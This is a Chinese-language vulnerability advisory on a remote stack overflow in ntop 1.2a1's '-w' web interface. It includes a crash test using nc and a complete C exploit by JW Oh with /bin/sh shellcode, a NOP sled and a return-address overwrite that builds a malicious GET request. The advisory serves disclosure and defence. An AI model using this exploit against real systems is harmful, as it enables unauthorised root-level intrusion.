ntop -w 参数远程溢出漏洞
发布日期:2000-10-26
更新日期:2000-10-26
受影响系统:
ntop 1.2a1
- Redhat Linux 6.x
描述:
ntop是一个用来监视和分析unix系统网络使用状况的工具,如果使用"-w"参数启
动ntop,它会提供一个web接口,允许通过web远程访问它。
当提供一个超常的文件名给正在监听的ntop时,将导致ntop发生堆栈溢出,攻击
者可能远程得到超级用户权限。
<* 来源: JW Oh (
mat@IVNTECH.COM) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
按照下列步骤可以测试是否您的ntop是有问题的:
1. $ ntop -w 8080
2. $ printf "GET /`perl -e 'print "A"x240'`\r\n\r\n" |nc localhost 8080
3. ntop会发生段访问错误:
$ ntop -w 8080
ntop v.1.2a1 MT [i686-pc-linux-gnu] listening on eth0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
Segmentation fault
4. 下面是JW Oh提供的测试代码:
----------------------ntop-w-exp.c-----start-----------------------
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
void usage()
{
printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
printf(" mat@hacksware.com\n")
exit(0);
}
void main( int argc, char *argv[] )
{
int i,offset=-24;
#define CODE_LEN 240
#define NOP_LEN 50
char code_buf[CODE_LEN];
unsigned long esp=0xbedffb00;
if(argc >= 2) offset = atoi(argv[1]);
memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
*(long *)&code_buf[i]=(unsigned long)esp-offset;
printf("GET /");
for(i=0;i<CODE_LEN; i++)
{
putchar(code_buf[i]);
}
printf("\r\n\r\n");
}
-------------------------ntop-w-exp.c----end--------------------------
建议:
临时解决方法:
NSFOCUS建议您在没有升级程序或安装补丁之前暂时停止使用ntop -w监听端口。
厂商补丁:
暂无.
浏览次数:6517
严重程度:0(网友投票)